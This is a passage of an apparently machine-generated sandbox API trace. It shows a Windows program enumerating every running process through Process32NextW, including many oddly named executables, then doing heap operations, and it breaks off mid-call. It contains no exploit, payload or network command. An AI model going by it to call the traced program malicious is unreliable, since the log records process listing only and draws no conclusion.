lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0042.571] lstrlenW (lpString="dwm.exe") returned 7 [0042.571] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.572] lstrlenW (lpString="svchost.exe") returned 11 [0042.572] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.572] lstrlenW (lpString="svchost.exe") returned 11 [0042.573] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.573] lstrlenW (lpString="svchost.exe") returned 11 [0042.573] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.574] lstrlenW (lpString="svchost.exe") returned 11 [0042.574] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.584] lstrlenW (lpString="svchost.exe") returned 11 [0042.584] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.585] lstrlenW (lpString="svchost.exe") returned 11 [0042.585] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.586] lstrlenW (lpString="svchost.exe") returned 11 [0042.586] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.587] lstrlenW (lpString="svchost.exe") returned 11 [0042.587] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.588] lstrlenW (lpString="svchost.exe") returned 11 [0042.588] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0042.589] lstrlenW (lpString="spoolsv.exe") returned 11 [0042.589] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.589] lstrlenW (lpString="svchost.exe") returned 11 [0042.589] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.590] lstrlenW (lpString="svchost.exe") returned 11 [0042.590] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0042.591] lstrlenW (lpString="audiodg.exe") returned 11 [0042.591] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0042.591] lstrlenW (lpString="sihost.exe") returned 10 [0042.592] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.592] lstrlenW (lpString="svchost.exe") returned 11 [0042.592] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0042.593] lstrlenW (lpString="taskhostw.exe") returned 13 [0042.593] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0042.594] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0042.594] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0042.595] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0042.595] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0042.596] lstrlenW (lpString="explorer.exe") returned 12 [0042.596] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0042.596] lstrlenW (lpString="Memory Compression") returned 18 [0042.596] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0042.597] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0042.597] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0042.598] lstrlenW (lpString="SearchUI.exe") returned 12 [0042.598] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0042.599] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0042.599] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0042.599] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0042.599] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0042.600] lstrlenW (lpString="taskhostw.exe") returned 13 [0042.600] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0042.601] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0042.601] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0042.602] lstrlenW (lpString="UsoClient.exe") returned 13 [0042.602] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0042.602] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0042.602] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0042.603] lstrlenW (lpString="taskhostw.exe") returned 13 [0042.603] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0042.604] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0042.604] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0042.604] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0042.604] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0042.605] lstrlenW (lpString="msoia.exe") returned 9 [0042.605] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0042.606] lstrlenW (lpString="msoia.exe") returned 9 [0042.606] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0042.606] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0042.606] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0042.611] lstrlenW (lpString="screensaver.exe") returned 15 [0042.611] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0042.612] lstrlenW (lpString="xml upper.exe") returned 13 [0042.612] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0042.613] lstrlenW (lpString="defeat preston.exe") returned 18 [0042.613] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0042.613] lstrlenW (lpString="boss isolated.exe") returned 17 [0042.613] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0042.614] lstrlenW (lpString="member.exe") returned 10 [0042.614] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0042.615] lstrlenW (lpString="chubby-er.exe") returned 13 [0042.615] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0042.616] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0042.616] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0042.616] lstrlenW (lpString="organization.exe") returned 16 [0042.617] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0042.617] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0042.617] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0042.618] lstrlenW (lpString="spray-roman.exe") returned 15 [0042.618] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0042.619] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0042.619] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0042.620] lstrlenW (lpString="tank attacks.exe") returned 16 [0042.620] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0042.621] lstrlenW (lpString="wires jacket.exe") returned 16 [0042.621] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0042.622] lstrlenW (lpString="values.exe") returned 10 [0042.622] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0042.623] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0042.623] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0042.624] lstrlenW (lpString="printersaerospace.exe") returned 21 [0042.624] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0042.625] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0042.625] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0042.626] lstrlenW (lpString="dllhost.exe") returned 11 [0042.626] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0042.627] lstrlenW (lpString="joke.exe") returned 8 [0042.627] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0042.628] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0042.628] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0042.629] lstrlenW (lpString="documents.exe") returned 13 [0042.629] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0042.629] lstrlenW (lpString="rebel.exe") returned 9 [0042.629] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0042.630] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0042.630] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.631] lstrlenW (lpString="conhost.exe") returned 11 [0042.631] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.632] lstrlenW (lpString="conhost.exe") returned 11 [0042.632] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0042.632] lstrlenW (lpString="dllhost.exe") returned 11 [0042.632] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0042.633] lstrlenW (lpString="dllhost.exe") returned 11 [0042.633] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0042.634] lstrlenW (lpString="hgaibc.exe") returned 10 [0042.634] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0042.635] CloseHandle (hObject=0x240) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea420 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea468 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5490 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5410 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6168 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615438 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e53d0 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5350 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60eac0 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7c8 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5330 | out: hHeap=0x5d0000) returned 1 [0042.635] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7f0 | out: hHeap=0x5d0000) returned 1 [0042.635] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x617700 [0042.635] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x627708 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615300 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615300, Size=0x20) returned 0x60e7a0 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e7a0, Size=0x40) returned 0x5ea420 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6152a0 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6152a0, Size=0x20) returned 0x60e958 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6153a8 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6153a8, Size=0x20) returned 0x60eb10 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615240 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615240, Size=0x20) returned 0x60e980 [0042.636] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e980, Size=0x40) returned 0x5e9fa0 [0042.636] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x627708, 